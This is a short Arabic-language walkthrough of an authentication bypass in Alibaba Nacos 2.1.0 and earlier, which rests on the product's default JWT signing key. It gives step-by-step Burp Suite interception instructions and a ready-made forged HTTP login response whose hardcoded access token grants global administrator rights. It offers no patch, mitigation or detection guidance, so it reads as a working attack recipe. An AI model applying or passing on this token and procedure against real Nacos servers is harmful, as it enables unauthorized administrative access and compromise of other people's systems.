
دخول غير مصرح به في Alibab Nacos
تم اكتشاف مشكلة في Nacos تؤثر على Nacos <= 2.1.0. يستخدم مستخدمو Nacos مفتاح JWT الافتراضي مما يؤدي إلى ثغرة وصول غير مصرح به. من خلال هذه الثغرة، يمكن للمهاجمين تجاوز مصادقة اسم المستخدم وكلمة المرور وتسجيل الدخول مباشرة إلى مستخدم Nacos.
إصدار Nacos <= 2.1.0
الخطوة 1:انتقل مباشرة إلى موقع Nacos، وأدخل أي اسم مستخدم وكلمة مرور واستخدم Burpsuite لالتقاط الحزمة.

الخطوة 2:اعترض حزمة الاستجابة.

الخطوة 3: عدّل حزمة البيانات كما يلي
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

الخطوة 4: سجّل الدخول بنجاح بعد تمرير حزمة البيانات.
